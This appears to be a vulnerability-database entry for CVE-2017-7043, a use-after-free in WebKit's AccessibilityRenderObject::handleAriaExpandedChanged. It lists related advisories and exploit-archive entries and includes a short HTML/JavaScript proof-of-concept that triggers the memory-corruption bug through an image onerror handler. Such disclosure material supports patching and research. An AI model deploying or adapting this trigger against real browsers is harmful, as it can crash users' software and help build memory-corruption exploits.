use-after-free in WebCore::AccessibilityRenderObject::handleAriaExpandedChanged(CVE-2017-7043). Vulnerability confirmed on WebKit nightly ASan build. Accessibility features need to be enabled to trigger the bug
Reporter | Title | Published | Views | Family All 42 |
---|---|---|---|---|
0day.today | WebKit - WebCore::AccessibilityRenderObject::handleAriaExpandedChanged Use-After-Free Exploit | 24 Jul 201700:00 | – | zdt |
UbuntuCve | CVE-2017-7043 | 20 Jul 201700:00 | – | ubuntucve |
Packet Storm | WebKit WebCore::AccessibilityRenderObject::handleAriaExpandedChanged Use-After-Free | 25 Jul 201700:00 | – | packetstorm |
Exploit DB | WebKit - 'WebCore::AccessibilityRenderObject::handleAriaExpandedChanged' Use-After-Free | 24 Jul 201700:00 | – | exploitdb |
NVD | CVE-2017-7043 | 20 Jul 201716:29 | – | nvd |
Cvelist | CVE-2017-7043 | 20 Jul 201716:00 | – | cvelist |
Prion | Memory corruption | 20 Jul 201716:29 | – | prion |
CVE | CVE-2017-7043 | 20 Jul 201716:29 | – | cve |
Debian CVE | CVE-2017-7043 | 20 Jul 201716:29 | – | debiancve |
Tenable Nessus | GLSA-201710-14 : WebKitGTK+: Multiple Vulnerabilities | 16 Oct 201700:00 | – | nessus |
<style>
#div { visibility: collapse }
</style>
<script>
function eventhandler() {
document.execCommand("bold", false);
img.style.removeProperty("-webkit-appearance");
img.setAttribute("aria-expanded", "false");
}
</script>
<div id="div">
<dl>
<canvas>aaa</canvas>
<img id="img" src="x" style="-webkit-appearance: relevancy-level-indicator;" onerror="eventhandler()">
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo